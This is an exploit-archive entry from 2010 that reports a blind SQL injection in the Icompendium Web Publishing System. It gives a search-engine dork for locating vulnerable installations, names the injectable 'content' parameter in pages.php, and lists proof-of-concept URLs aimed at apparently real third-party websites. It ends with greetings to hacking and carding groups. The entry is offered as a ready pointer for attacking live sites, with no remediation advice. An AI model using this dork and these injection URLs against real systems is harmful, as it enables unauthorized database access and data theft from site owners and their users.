Icompendium Web Publishing System Blind SQL Injection Vulnerability

2010-08-01T00:00:00
ID 1337DAY-ID-13540
Type zdt
Reporter poni
Modified 2010-08-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================================
Icompendium Web Publishing System Blind SQL Injection Vulnerability
===================================================================


# Date: 01/08/2010
# Software Link : http://www.icompendium.com
# Author: poni
# Site : http://forum.xcode.or.id
---------------------------------------------------------------------------------------------------------------------------------
Dork:
[code]An icompendium Site inurl:/content=gallery.php[/code]
---------------------------------------------------------------------------------------------------------------------------------
%
[+] Vulnerable Path :
http://www.daehyuksim.com/pages.php?content=[BLIND SQL INJ]gallery.php&navGallID=XX
%
---------------------------------------------------------------------------------------------------------------------------------
%
[+] POC :
http://www.popboom.net/pages.php?content='gallery.php&navGallID=1
http://www.hjbott.com/pages.php?content='gallery.php&navGallID=5
%
---------------------------------------------------------------------------------------------------------------------------------
&
Greetz :
[+] inj3ct0r.com
[+] ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath,
     fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666,Phychole,
     Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr, And You... the marvellous XCoders
     those change the Indonesian Undergorund scenes
# serverisdown.org, ssteam.ws, codenesia.com,hacker-newbie.org, YogyaCarderlink.web.id,
   devilzc0de.org, indonesianhacker.or.id
---------------------------------------------------End Of Paper---------------------------------------------------------------



#  0day.today [2018-03-19]  #